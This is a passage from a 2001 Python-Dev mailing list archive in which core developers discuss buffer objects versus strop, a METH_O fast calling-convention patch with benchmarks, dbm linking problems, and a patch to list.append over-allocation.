is not broken. There was some debate about how detailed that discussion should be; the point was made that it's not really important to explain precisely *why* this happens, as long as it convinces the newbie that floating point is more complicated than he or she thinks. Let's hope that suitable text is composed soon, and that people actually read it... there have been two "floating point is broken" bug reports on sourceforge in just the last week. * unifying os.rename semantics across platforms * Skip pointed out that os.rename behaves differently on Posix and Windows platforms when the destination file exists: on Posix the destination is silently replaced in an atomic operation, whereas on Windows an exception is raised. Skip proposed enforcing Posix semantics everywhere, but this has two problems: (a) it's backwards incompatible, and (b) it's impossible (you can't avoid the race condition on Windows). So maybe we'll just settle for better documentation. * Python 2.1.1 * Thomas Wouters started back-porting bug fixes to the 2.1-maint branch in preparation for a 2.1.1 release. There are as yet no firm (or even vague) plans about release dates. * Daily Python-URL on your Palm * Marc-Andre Lemburg announced that you can now read Pythonware's Daily Python-URL on your Palm Pilot as an AvantGo channel: Cheers, M. From gstein@lyra.org Thu May 24 20:45:18 2001 From: gstein@lyra.org (Greg Stein) Date: Thu, 24 May 2001 12:45:18 -0700 Subject: [Python-Dev] strop vs.
string In-Reply-To: <3B0D20A0.3C881F89@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 04:54:24PM +0200 References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> Message-ID: <20010524124518.N5402@lyra.org> On Thu, May 24, 2001 at 04:54:24PM +0200, M.-A. Lemburg wrote: >... > That's the point: you can wrap all those into a buffer object > and then use the buffer object methods to manipulate them. In > that sense, buffer objects provide an adaptor to the underlying > object which implements the needed methods. That would certainly be a valid solution. And at the C level, we could share functions between PyBufferObject and PyStringObject. Cheers, -g -- Greg Stein, http://www.lyra.org/ From gstein@lyra.org Thu May 24 21:07:43 2001 From: gstein@lyra.org (Greg Stein) Date: Thu, 24 May 2001 13:07:43 -0700 Subject: [Python-Dev] APR (was: IPv6) In-Reply-To: <15117.12192.114564.111578@beluga.mojam.com>; from skip@pobox.com on Thu, May 24, 2001 at 10:58:24AM -0500 References: <20010524055555.B5402@lyra.org> <15117.12192.114564.111578@beluga.mojam.com> Message-ID: <20010524130743.O5402@lyra.org> On Thu, May 24, 2001 at 10:58:24AM -0500, skip@pobox.com wrote: > > >> > It currently supports: Unix (includes BeOS), Win32 and OS/2. > >> > >> A lot more than that :-) Pretty much all the Unix variants, including > >> OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. > > Michael> That's still less than Python isn't it? RiscOS, Amiga, PalmOS, > Michael> VMS, Playstation 2(!), > > Not to mention MacOS < X... ;-) As I mentioned, MacOS X is already there. MacOS Classic is not. But the presence of a portability library such as APR does not exclude the use of direct platform hooks where/when necessary. For a bunch of stuff, you use APR [to reduce complexity/maintenance]. For the rest, you go native just like today. 
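Greg's "portable layer by default, native hook where it pays" split can be illustrated at the Python level. The sketch below is not APR code and not how CPython is organised; it only shows the pattern, assuming `os.sendfile()` as the native hook (it exists only on some platforms, and on some of those the destination must be a socket) and a plain `read()`/`write()` loop as the portable path. The helper `copy_fd` and the `demo` function are hypothetical.

```python
import os
import tempfile

def copy_fd(in_fd: int, out_fd: int, count: int) -> int:
    """Copy up to `count` bytes from the start of in_fd to out_fd.

    Hypothetical helper: try the native os.sendfile() hook first and fall
    back to a portable read()/write() loop if it is missing or refused.
    """
    sent = 0
    native = getattr(os, "sendfile", None)  # absent on e.g. Windows
    if native is not None:
        try:
            while sent < count:
                n = native(out_fd, in_fd, sent, count - sent)
                if n == 0:  # reached end of input
                    break
                sent += n
            return sent
        except OSError:
            if sent:  # a partial native copy happened; don't restart silently
                raise
    # Portable path: ordinary reads and writes from the start of in_fd.
    os.lseek(in_fd, 0, os.SEEK_SET)
    while sent < count:
        chunk = os.read(in_fd, min(65536, count - sent))
        if not chunk:
            break
        view = memoryview(chunk)
        while view:  # os.write() may write fewer bytes than requested
            written = os.write(out_fd, view)
            view = view[written:]
            sent += written
    return sent

def demo() -> bytes:
    """Copy a short payload between two temporary files and read it back."""
    with tempfile.TemporaryFile() as src, tempfile.TemporaryFile() as dst:
        src.write(b"hello world")
        src.flush()
        copy_fd(src.fileno(), dst.fileno(), 11)
        dst.seek(0)
        return dst.read()

print(demo())
```

Callers see one function either way; only the implementation decides whether the platform offers something better.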
Cheers, -g -- Greg Stein, http://www.lyra.org/ From skip@pobox.com (Skip Montanaro) Thu May 24 22:15:48 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Thu, 24 May 2001 16:15:48 -0500 Subject: [Python-Dev] Odd message from test_dbm Message-ID: <15117.31236.804746.160037@beluga.mojam.com> I just noticed this message when running make test: test test_dbm skipped -- /home/skip/src/python/dist/src/build/build/lib.linux-i686-2.1/dbm.so: undefined symbol: dbm_firstkey I'm running a vanilla Mandrake 8.0 system. Unfortunately, I can't check libc.so or /usr/lib/libgdbm.so because the Mandrake folks saw fit to strip them... Anybody else seen this? Skip From thomas@xs4all.net Thu May 24 22:42:58 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Thu, 24 May 2001 23:42:58 +0200 Subject: [Python-Dev] Odd message from test_dbm In-Reply-To: <15117.31236.804746.160037@beluga.mojam.com>; from skip@pobox.com on Thu, May 24, 2001 at 04:15:48PM -0500 References: <15117.31236.804746.160037@beluga.mojam.com> Message-ID: <20010524234258.I690@xs4all.nl> On Thu, May 24, 2001 at 04:15:48PM -0500, skip@pobox.com wrote: > I just noticed this message when running make test: > test test_dbm skipped -- /home/skip/src/python/dist/src/build/build/lib.linux-i686-2.1/dbm.so: undefined symbol: dbm_firstkey > I'm running a vanilla Mandrake 8.0 system. Unfortunately, I can't check > libc.so or /usr/lib/libgdbm.so because the Mandrake folks saw fit to strip > them... The problem is that the dbmmodule isn't linked to the right library. Debian has a similar (if not the same) problem. setup.py doesn't try hard enough to figure out the right library to link with; it checks for libndbm, but not libdbm or libgdbm (it assumes DBM support is in libc if not in libndbm.) I *think* all it needs to do is check for libdbm as well as libndbm, but this might pick up old/incompatible libraries on some platforms, and it might still require fiddling of include paths on others. 
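Thomas's suggestion amounts to probing several candidate libraries for the symbol the module actually needs, instead of assuming libc. The real `setup.py` works at build time; the sketch below is only a run-time analogue using `ctypes`, and the candidate list (including `gdbm_compat`, where newer gdbm releases are assumed to keep their ndbm emulation) is an assumption, not what `setup.py` does.

```python
import ctypes
import ctypes.util

# Hypothetical probe order: the libraries named in the thread, plus gdbm's
# separate compatibility library (an assumption).
CANDIDATES = ["ndbm", "dbm", "gdbm_compat", "gdbm", "c"]

def find_dbm_library(symbol="dbm_firstkey", candidates=CANDIDATES):
    """Return (name, path) of the first library exporting `symbol`, or None."""
    for name in candidates:
        path = ctypes.util.find_library(name)
        if path is None:
            continue  # not installed, or not visible to the linker
        try:
            lib = ctypes.CDLL(path)
        except OSError:
            continue  # found but not loadable
        # Attribute access does a dlsym() lookup; a missing symbol raises
        # AttributeError, which hasattr() turns into False.
        if hasattr(lib, symbol):
            return name, path
    return None

print(find_dbm_library())
```

A `None` result corresponds to Skip's situation: no library on the search path provides `dbm_firstkey`.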
I seem to recall you had to include either /usr/include/db1/ndbm.h (to use libdbm) or /usr/include/gdbm/ndbm.h or /usr/include/gdbm-ndbm.h (to use gdbm's ndbm 'emulation') but I gave up in frustration trying to figure out the difference :P -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From greg@cosc.canterbury.ac.nz Fri May 25 03:45:01 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Fri, 25 May 2001 14:45:01 +1200 (NZST) Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0CE00A.488C8D73@lemburg.com> Message-ID: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz> "M.-A. Lemburg" : > BTW, wouldn't it suffice to add these methods to buffer objects ? > Then you could write: buffer(ob).find('.'). Aren't buffer objects as they're currently implemented inherently dangerous? Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From martin@loewis.home.cs.tu-berlin.de Fri May 25 07:00:47 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Fri, 25 May 2001 08:00:47 +0200 Subject: [Python-Dev] Special-casing "O" Message-ID: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> > Special-casing the snot out of "O" looks like a winner : I have a patch on SF that takes this approach: http://sourceforge.net/tracker/index.php?func=detail&aid=427190&group_id=5470&atid=305470 The idea is that functions can be declared as METH_O, instead of METH_VARARGS. I also offer METH_l, but this is currently not used. The approach could be extended to other signatures, e.g. METH_O_opt_O (i.e. "O|O"). Some signatures cannot be changed into special-calls, e.g. "O!", or "ll|l". 
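The overhead Martin is targeting, calls to builtins that take exactly one object, can be timed in Python 3 with the standard `timeit` module. A rough sketch; the statements and loop counts are arbitrary choices, absolute numbers depend entirely on interpreter and machine, and current CPython already declares `len`, `ord` and `list.append` as `METH_O`:

```python
import timeit

def time_single_arg_calls(number: int = 200_000, repeat: int = 3) -> dict:
    """Best-of-`repeat` wall time, in seconds, for `number` one-argument calls."""
    # Bind the callables to local names so attribute lookup isn't timed.
    setup = "f_ord = ord; f_len = len; lst = []; f_append = lst.append"
    stmts = {
        "ord": "f_ord('o')",
        "len": "f_len('o')",
        "append": "f_append(1)",
    }
    return {
        name: min(timeit.repeat(stmt, setup=setup, number=number, repeat=repeat))
        for name, stmt in stmts.items()
    }

for name, secs in time_single_arg_calls().items():
    print(f"{name:7s} {secs:.3f}s")
```

Taking the minimum of several repeats is the usual way to damp noise from other activity on the machine.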
In the PyXML test suite, "O" is indeed the most frequent case (72%), and it is primarily triggered through len (26%), append (24%), and ord (6%). These are the only functions that make use of the new calling conventions at the moment. If you look at the patch, you'll see that it is quite easy to change a method to use a different calling convention (basically just remove the PyArg_ParseTuple call). To measure the patch, I use the script

    from time import clock

    indices = [1] * 20000
    indices1 = indices*100
    r1 = [1]*60

    def doit(case):
        s = clock()
        i = 0
        if case == 0:
            f = ord
            for i in indices1:
                f("o")
        elif case == 1:
            for i in indices:
                l = []
                f = l.append
                for i in r1:
                    f(i)
        elif case == 2:
            f = len
            for i in indices1:
                f("o")
        f = clock()
        return f - s

    for i in xrange(10):
        print "%.3f %.3f %.3f" % (doit(0),doit(1),doit(2))

Without the patch, (almost) stock CVS gives

    2.190 1.800 2.240
    2.200 1.800 2.220
    2.200 1.800 2.230
    2.220 1.800 2.220
    2.200 1.800 2.220
    2.200 1.790 2.240
    2.200 1.790 2.230
    2.200 1.800 2.220
    2.200 1.800 2.240
    2.200 1.790 2.230

With the patch, I get

    1.440 1.330 1.460
    1.420 1.350 1.440
    1.430 1.340 1.430
    1.510 1.350 1.460
    1.440 1.360 1.470
    1.460 1.330 1.450
    1.430 1.330 1.420
    1.440 1.340 1.440
    1.430 1.340 1.430
    1.410 1.340 1.450

So the speed-up is roughly 30% to 50%, depending on how much work the function has to do. Please let me know what you think. Regards, Martin From mal@lemburg.com Fri May 25 09:23:10 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Fri, 25 May 2001 10:23:10 +0200 Subject: [Python-Dev] strop vs. string References: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz> Message-ID: <3B0E166E.581816AA@lemburg.com> Greg Ewing wrote: > > "M.-A. Lemburg" : > > > BTW, wouldn't it suffice to add these methods to buffer objects ? > > Then you could write: buffer(ob).find('.'). > > Aren't buffer objects as they're currently implemented > inherently dangerous? Why should they be ?
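MAL's adaptor idea (one wrapper that gives string-style methods to anything exporting the buffer interface, as in `buffer(ob).find('.')`) maps fairly directly onto Python 3's `memoryview`. The class below is a hypothetical sketch: `BufferAdapter` is not a real library class, and its `find()` is a naive byte-by-byte search kept short for clarity, not the optimized routine used by `strop` or `str`.

```python
import array

class BufferAdapter:
    """Hypothetical adaptor: string-style methods over any buffer exporter."""

    def __init__(self, obj):
        # Flat, zero-copy view of the exporter's raw bytes.
        self._view = memoryview(obj).cast("B")

    def find(self, sub: bytes, start: int = 0) -> int:
        """Lowest index >= start where `sub` occurs, or -1 (naive search)."""
        sub = bytes(sub)
        n, m = len(self._view), len(sub)
        for i in range(max(start, 0), n - m + 1):
            if self._view[i:i + m] == sub:
                return i
        return -1

    def upper(self) -> bytes:
        """ASCII upper-casing; returns a new bytes object."""
        return self._view.tobytes().upper()

print(BufferAdapter(b"spam.eggs").find(b"."))             # 4
print(BufferAdapter(array.array("B", b"a.b")).find(b"."))  # 1
```

The same wrapper accepts `bytes`, `bytearray`, `array.array` and `mmap` objects, which is the polymorphism Greg wanted from `strop.find()`.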
-- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Fri May 25 09:56:12 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Fri, 25 May 2001 10:56:12 +0200 Subject: [Python-Dev] Special-casing "O" References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> Message-ID: <3B0E1E2C.4BC121B5@lemburg.com> "Martin v. Loewis" wrote: > > > Special-casing the snot out of "O" looks like a winner : > > I have a patch on SF that takes this approach: > > http://sourceforge.net/tracker/index.php?func=detail&aid=427190&group_id=5470&atid=305470 > > The idea is that functions can be declared as METH_O, instead of > METH_VARARGS. I also offer METH_l, but this is currently not used. The > approach could be extended to other signatures, e.g. METH_O_opt_O > (i.e. "O|O"). Some signatures cannot be changed into special-calls, > e.g. "O!", or "ll|l". > > [benchmark] > So the speed-up is roughly 30% to 50%, depending on how much work the > function has to do. > > Please let me know what you think. Great idea, Martin. One suggestion though: I would change the way the function is "declared" in the method list. You currently use:

    {"append", (PyCFunction)listappend, METH_O, append_doc},

Now this would be more flexible if you would implement a scheme which lets us put the parser string into the method list. The call mechanism could then easily figure out how to call the method and it would also be more easily extensible:

    {"append", (PyCFunction)listappend, METH_DIRECT, append_doc, "O"},

This would then (just like in your patch) call the listappend function with the parser arguments inlined into the C call:

    listappend(self, arg0)

A parser marker "OO" would then call a method like this:

    method(self, arg0, arg1)

and so on.
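To make the proposal concrete, here is a small Python model of a method entry that carries a PyArg_ParseTuple-style format string, with omitted optional arguments passed as `None` (standing in for a NULL pointer). Everything here is hypothetical: `make_direct`, the three supported codes and the error messages are illustrative only, and the real proposal concerns C function pointers, where each prototype has to be written out in source.

```python
# Hypothetical type checks for a few PyArg_ParseTuple-style codes.
CODE_TYPES = {"O": object, "i": int, "s": str}

def make_direct(func, fmt):
    """Wrap func(self, *args) so calls are checked against a format like "OO|i"."""
    required, _, optional = fmt.partition("|")
    codes = required + optional

    def call(self, *args):
        if not len(required) <= len(args) <= len(codes):
            raise TypeError(
                f"expected {len(required)} to {len(codes)} arguments, got {len(args)}")
        for code, arg in zip(codes, args):
            if not isinstance(arg, CODE_TYPES[code]):
                raise TypeError(f"wrong type for {code!r}: {type(arg).__name__}")
        # Omitted optional arguments arrive as None, playing the role of NULL.
        padded = args + (None,) * (len(codes) - len(args))
        return func(self, *padded)

    return call

def replace_impl(self, old, new, count):
    return self.replace(old, new, -1 if count is None else count)

replace = make_direct(replace_impl, "OO|i")
print(replace("a-b-c", "-", "+"))     # a+b+c
print(replace("a-b-c", "-", "+", 1))  # a+b-c
```

The format string is interpreted on every call here; a C implementation would instead select one of a fixed set of prototypes when the method table is built.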
This approach costs a little more (the string compare), but should provide a more direct way of converting existing functions to the new convention (just copy&paste the PyArg_ParseTuple() argument) and also allows implementing a generic scheme which then again relies on PyArg_ParseTuple() to do the argument parsing, e.g. "is#" could be implemented as:

    PyObject *method(PyObject *self, int arg0, char *arg1, int *arg1_len)

For optional arguments we'd need some convention which then lets the called function add the default value as needed. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From ping@lfw.org Fri May 25 11:56:33 2001 From: ping@lfw.org (Ka-Ping Yee) Date: Fri, 25 May 2001 05:56:33 -0500 (CDT) Subject: [Python-Dev] May 25 is Towel Day (towelday.org) Message-ID: If you have enjoyed Douglas Adams' works, please consider carrying or wearing a towel with you everywhere today, May 25, as a tribute and in his memory. For more about Towel Day, visit http://www.towelday.org/. My apologies for being off-topic. -- ?!ng From gstein@lyra.org Fri May 25 12:59:23 2001 From: gstein@lyra.org (Greg Stein) Date: Fri, 25 May 2001 04:59:23 -0700 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0E166E.581816AA@lemburg.com>; from mal@lemburg.com on Fri, May 25, 2001 at 10:23:10AM +0200 References: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz> <3B0E166E.581816AA@lemburg.com> Message-ID: <20010525045923.C12056@lyra.org> On Fri, May 25, 2001 at 10:23:10AM +0200, M.-A. Lemburg wrote: > Greg Ewing wrote: > > "M.-A. Lemburg" : > > > > > BTW, wouldn't it suffice to add these methods to buffer objects ? > > > Then you could write: buffer(ob).find('.'). > > > > Aren't buffer objects as they're currently implemented > > inherently dangerous? > > Why should they be ?
The buffer object caches the pointer from getreadbuffer and friends. If the target object changes that pointer (internally), then the buffer object's value is stale. But that is a bug fix; it is independent of the discussion at hand. Cheers, -g -- Greg Stein, http://www.lyra.org/ From Barrett@stsci.edu Fri May 25 14:21:20 2001 From: Barrett@stsci.edu (Paul Barrett) Date: Fri, 25 May 2001 09:21:20 -0400 Subject: [Python-Dev] strop vs. string References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> Message-ID: <3B0E5C50.6E365F69@STScI.Edu> "M.-A. Lemburg" wrote: > > > > BTW, wouldn't it suffice to add these methods to buffer objects ? > > > Then you could write: buffer(ob).find('.'). > > > > You're totally missing the point with that suggestion. It does *not* > > suffice to add them to buffer objects. What about array objects? mmap > > objects? Random Joe Object who implements the buffer interface? > > That's the point: you can wrap all those into a buffer object > and then use the buffer object methods to manipulate them. In > that sense, buffer objects provide an adaptor to the underlying > object which implements the needed methods. Sounds like you are trying to make the buffer object into something it is not. Not that I have the foggiest idea what it is now, since it hasn't much use and is badly broken. I like your idea of sharing functions, I just don't think the buffer object is the proper means. I think the buffer object should be removed from Python and something better put in its place. (I'm not talking about the buffer C/API, though this could also use an overhaul, since it doesn't provide enough information to the receiving method.) What I think we need is: 1) a malloc object which has a similar interface to the mmap object with access protection, etc. This object would be the fundamental way of getting memory. 
The string object would use it to allocate a chunk of 'read-only' memory. Other objects would then know not to modify the contents of the memory. If you wanted a reference or view of the memory/buffer, you would get a reference to this object. 2) objects supporting the buffer object should provide a view method which returns a copy of themselves (and hence all their methods) and can be used to get a pointer to a subset of its memory. In this way the type of memory/buffer being accessed is known compared to the current buffer object which only indicates the buffer is binary or char data. In essence information about how the buffer should be used is lost in the current buffer C/API. -- Paul Barrett, PhD Space Telescope Science Institute Phone: 410-338-4475 ESS/Science Software Group FAX: 410-338-4767 Baltimore, MD 21218 From guido@digicool.com Fri May 25 15:29:28 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 25 May 2001 10:29:28 -0400 Subject: [Python-Dev] Vacation Message-ID: <200105251429.f4PETSd10633@odiug.digicool.com> I will be on vacation next week without net access. Back on June 4th! There's a bunch of stuff that happened on the mailing list that I expect I won't get to -- I've got to finish up some high priority work for Digital Creations before I can leave. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one@home.com Fri May 25 20:06:16 2001 From: tim.one@home.com (Tim Peters) Date: Fri, 25 May 2001 15:06:16 -0400 Subject: [Python-Dev] Time for the yearly list.append() panic Message-ID: c.l.py has rediscovered the quadratic-time worst-case behavior of list.append(). That is, do list.append(x) in a long loop. Linux users don't see anything particularly bad no matter how big the loop. WinNT eventually displays clear quadratic-time behavior. 
Win9x dies surprisingly early with a MemoryError, despite gobs of memory free: turns out Win9x allocates hundreds of virtual heaps, isn't able to coalesce them, and you actually run out of *address space* (the whole 2GB user space gets fragmented beyond hope). People on other platforms have reported other bad behaviors over the years. I don't want to argue about this again, I just want to know whether the patch below slows anything down on your oddball box. It increases the over-allocation amount in several more layers. It also replaces integer * and / in the over-allocation computation by bit operations (integer / in particular is very slow on *some* boxes). Long-term we should teach PyMalloc about Python's realloc() abuses and craft a cooperative solution.

Index: Objects/listobject.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/listobject.c,v
retrieving revision 2.92
diff -c -r2.92 listobject.c
*** Objects/listobject.c	2001/02/12 22:06:02	2.92
--- Objects/listobject.c	2001/05/25 19:04:07
***************
*** 9,24 ****
  #include /* For size_t */
  #endif
  
! #define ROUNDUP(n, PyTryBlock) \
! 	((((n)+(PyTryBlock)-1)/(PyTryBlock))*(PyTryBlock))
  
  static int
  roundupsize(int n)
  {
! 	if (n < 500)
  		return ROUNDUP(n, 10);
  	else
! 		return ROUNDUP(n, 100);
  }
  
  #define NRESIZE(var, type, nitems) PyMem_RESIZE(var, type, roundupsize(nitems))
--- 9,30 ----
  #include /* For size_t */
  #endif
  
! #define ROUNDUP(n, nbits) \
! 	( ((n) + (1<<(nbits)) - 1) >> (nbits) << (nbits) )
  
  static int
  roundupsize(int n)
  {
! 	if ((n >> 9) == 0)
! 		return ROUNDUP(n, 3);
! 	else if ((n >> 13) == 0)
! 		return ROUNDUP(n, 7);
! 	else if ((n >> 17) == 0)
  		return ROUNDUP(n, 10);
+ 	else if ((n >> 20) == 0)
+ 		return ROUNDUP(n, 13);
  	else
! 		return ROUNDUP(n, 18);
  }
  
  #define NRESIZE(var, type, nitems) PyMem_RESIZE(var, type, roundupsize(nitems))

From martin@loewis.home.cs.tu-berlin.de Fri May 25 20:51:26 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v.
Loewis) Date: Fri, 25 May 2001 21:51:26 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <3B0E1E2C.4BC121B5@lemburg.com> (mal@lemburg.com) References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> Message-ID: <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> > Now this would be more flexible if you would implement a scheme > which lets us put the parser string into the method list. The > call mechanism could then easily figure out how to call the > method and it would also be more easily extensible: > > {"append", (PyCFunction)listappend, METH_DIRECT, append_doc, "O"}, I'd like to hear other people's comments on this specific issue, so I guess I should probably write a PEP outlining the options. My immediate reaction to your proposal is that it only complicates the interface without any savings. We can still only support a limited number of calling conventions. E.g. it is not possible to write portable C code that does all the calling conventions for "l", "ll", "lll", "llll", and so on - you have to cast the function pointer to the right prototype, which must be done in source code. So with this interface, you may end up finding out at run-time that you cannot support the signature. With the current patch, you'd have to know to convert "OO" into METH_OO, which I don't think is asking too much - and it gives you a compile-time error if you use an unsupported calling convention. > A parser marker "OO" would then call a method like this: > > method(self, arg0, arg1) > > and so on. That is indeed the plan, but since you have to code the parameter combinations in C code, you can only support so many of them. > allows implementing a generic scheme which > then again relies on PyArg_ParseTuple() to do the argument > parsing, e.g. "is#" could be implemented as: The point of the patch is to get rid of PyArg_ParseTuple in the "common case".
For functions with complex calling conventions, getting rid of the PyArg_ParseTuple string parsing is not that important, since they are expensive, anyway (not that "is#" couldn't be supported, I'd call it METH_is_hash). > For optional arguments we'd need some convention which then > lets the called function add the default value as needed. For the moment, I'd only support "|O", and perhaps "|z"; an omitted argument would be represented as a NULL pointer. That means that "|i" couldn't participate in the fast calling convention - unless we translate that to void foo(PyObject*self, int i, bool ipresent); BTW, the most frequent function in my measurements that would make use of this convention is "OO|i:replace", which scores at 4.5%. Regards, Martin From gstein@lyra.org Fri May 25 21:27:52 2001 From: gstein@lyra.org (Greg Stein) Date: Fri, 25 May 2001 13:27:52 -0700 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0E5C50.6E365F69@STScI.Edu>; from Barrett@stsci.edu on Fri, May 25, 2001 at 09:21:20AM -0400 References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> <3B0E5C50.6E365F69@STScI.Edu> Message-ID: <20010525132752.B5402@lyra.org> On Fri, May 25, 2001 at 09:21:20AM -0400, Paul Barrett wrote: > "M.-A. Lemburg" wrote: > > > > > > BTW, wouldn't it suffice to add these methods to buffer objects ? > > > > Then you could write: buffer(ob).find('.'). > > > > > > You're totally missing the point with that suggestion. It does *not* > > suffice to add them to buffer objects. What about array objects? mmap > > objects? Random Joe Object who implements the buffer interface? > > > > That's the point: you can wrap all those into a buffer object > > and then use the buffer object methods to manipulate them. In > > that sense, buffer objects provide an adaptor to the underlying > > object which implements the needed methods. 
> > Sounds like you are trying to make the buffer object into something it > is not. The buffer object is intended to provide a Python-level object (with methods and behavior) for any other object which exports the buffer API (but not those particular methods/behavior). It was added for Python 1.5.2, but did not keep up with the methods added to the string object. Arguably, it is out of date rather than "[turning it into] something it is not." > Not that I have the foggiest idea what it is now, since it > hasn't much use and is badly broken. "badly" is overstating the problem. It caches a pointer when it shouldn't. This doesn't work well when using it with array objects or PIL's image objects. Most objects, it is fine. The buffer object is also very good for C/Python extensions and embedding code. It provides a Python-level view on a block of memory. Using a string object implies making a copy, and it removes the possibility for read/write access to that memory. And you state: "Not that I have the foggiest idea what it is now". If so, then wtf are you making statements about the buffer object's behavior? > I like your idea of sharing functions, I just don't think the buffer > object is the proper means. I think the buffer object should be > removed from Python and something better put in its place. (I'm not > talking about the buffer C/API, though this could also use an > overhaul, since it doesn't provide enough information to the receiving > method.) > > What I think we need is: > > 1) a malloc object which has a similar interface to the mmap object > with access protection, etc. This object would be the fundamental way > of getting memory. The string object would use it to allocate a chunk > of 'read-only' memory. Other objects would then know not to modify > the contents of the memory. If you wanted a reference or view of the > memory/buffer, you would get a reference to this object. You're talking about the buffer object that we have *today*. 
It can refer to another object (i.e. the memory exposed via the other object's buffer API), refer to memory, or it can allocate its own memory. The buffer object can be marked read-only, or read-write. > 2) objects supporting the buffer object should provide a view method > which returns a copy of themselves (and hence all their methods) and > can be used to get a pointer to a subset of its memory. In this way > the type of memory/buffer being accessed is known compared to the > current buffer object which only indicates the buffer is binary or > char data. In essence information about how the buffer should be used > is lost in the current buffer C/API. I'm not sure that I understand this paragraph. No... what needs to happen is to have the bug in PyBufferObject fixed. Then to refactor stringobject.c and stropmodule.c to move all of those byte-oriented processing functions into a new file such as Python/byteops.c (whatever; name isn't important). Ideally, stringobject.c and stropmodule.c would be simple covers over the same functions. Those functions can then be used by PyBufferObject to implement the rest of the string methods on itself. This would leave us at MAL's suggested point: via the buffer object, we can perform all of the standard string methods/ops on any object that implements the buffer API. Cheers, -g -- Greg Stein, http://www.lyra.org/ From mal@lemburg.com Fri May 25 22:16:32 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Fri, 25 May 2001 23:16:32 +0200 Subject: [Python-Dev] Time for the yearly list.append() panic References: Message-ID: <3B0ECBB0.6798F4AB@lemburg.com> Tim Peters wrote: > > Long-term we should teach PyMalloc about Python's realloc() abuses and craft a cooperative solution. That's what I think too. There's really not much point in trying to work around poor malloc() implementations when we've already got the cure built into Python... 
I just wish Vladimir would resurface again to complete his great work (AFAIK, pymalloc still has problems with threads). -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Fri May 25 22:38:15 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Fri, 25 May 2001 23:38:15 +0200 Subject: [Python-Dev] Special-casing "O" References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> Message-ID: <3B0ED0C7.F1A665EA@lemburg.com> "Martin v. Loewis" wrote: > > > Now this would be more flexible if you would implement a scheme > > which lets us put the parser string into the method list. The > > call mechanism could then easily figure out how to call the > > method and it would also be more easily extensible: > > > > {"append", (PyCFunction)listappend, METH_DIRECT, append_doc, "O"}, > > I'd like to hear other people's comment on this specific issue, so I > guess I should probably write a PEP outlining the options. > > My immediate reaction to your proposal is that it only complicates the > interface without any savings. We still can only support a limited > number of calling conventions. E.g. it is not possible to write > portable C code that does all the calling conventions for "l", "ll", > "lll", "llll", and so on - you have to cast the function pointer to > the right prototype, which must be done in source code. > > So with this interface, you may end up at run-time finding out that > you cannot support the signature. With the current patch, you'd have > to know to convert "OO" into METH_OO, which I think is not asked too > much - and it gives you a compile-time error if you use an unsupported > calling convention. True. It's unfortunate that C doesn't offer the reverse of varargs.h... 
> > A parser marker "OO" would then call a method like this: > > > > method(self, arg0, arg1) > > > > and so on. > > That is indeed the plan, but since you have to code the parameter > combinations in C code, you can only support so many of them. > > > allows implementing a generic scheme which > > then again relies on PyArg_ParseTuple() to do the argument > > parsing, e.g. "is#" could be implemented as: > > The point of the patch is to get rid of PyArg_ParseTuple in the > "common case". For functions with complex calling conventions, getting > rid of the PyArg_ParseTuple string parsing is not that important, > since they are expensive, anyway (not that "is#" couldn't be > supported, I'd call it METH_is_hash). > > > For optional arguments we'd need some convention which then > > lets the called function add the default value as needed. > > For the moment, I'd only support "|O", and perhaps "|z"; an omitted > argument would be represented as a NULL pointer. That means that "|i" > couldn't participate in the fast calling convention - unless we > translate that to > > void foo(PyObject*self, int i, bool ipresent); > > BTW, the most frequent function in my measurements that would make use > of this convention is "OO|i:replace", which scores at 4.5%. I was thinking of using pointer indirection for this: foo(PyObject *self, int *i) If i is given as argument, *i is set to the value, otherwise i is set to NULL. -- Marc-Andre Lemburg CEO eGenix.com Software 